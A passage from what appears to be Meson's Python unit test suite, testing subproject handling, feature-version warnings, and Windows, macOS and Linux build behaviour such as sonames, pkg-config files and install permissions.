tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targetting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targetting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targetting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
        # Assert the full list so that this test must be updated whenever the
        # set of ignored libs changes, and so the whole set gets tested.
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
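    # Parse `otool -L` output for the given artifact and return its
    # (compatibility_version, current_version) pair.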
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
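        # Point pkg-config at the generated .pc files in the build's private directory.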
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2])}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
        # generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
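# On macOS and Haiku no separate -pthread flag is needed (or emitted), so it
# is stripped from the expected Cflags on those platforms.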
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertNotIn('blub_blob_blib', pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
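# Each case below also counts the files matching the library name with
# glob(): 1 means only the real file exists, 2 means the real file plus one
# alias symlink, 3 means the real file plus two alias symlinks.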
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
lang_std = p + '_std'
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
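# _clang_at_least() takes two minimum versions, presumably one for upstream
# clang and one for Apple clang (Xcode).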
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()[lang_std].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly;
# hence, C++ is checked first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# turn unknown -std=... options into errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown during install fails non-fatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown during install fails non-fatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown during install fails non-fatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
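# For example, under the default install umask of 022 a file created with
# mode 0666 is installed as 0644 (rw-r--r--) and a directory created with
# 0777 ends up as 0755 (rwxr-xr-x), which is what the assertions below expect.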
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
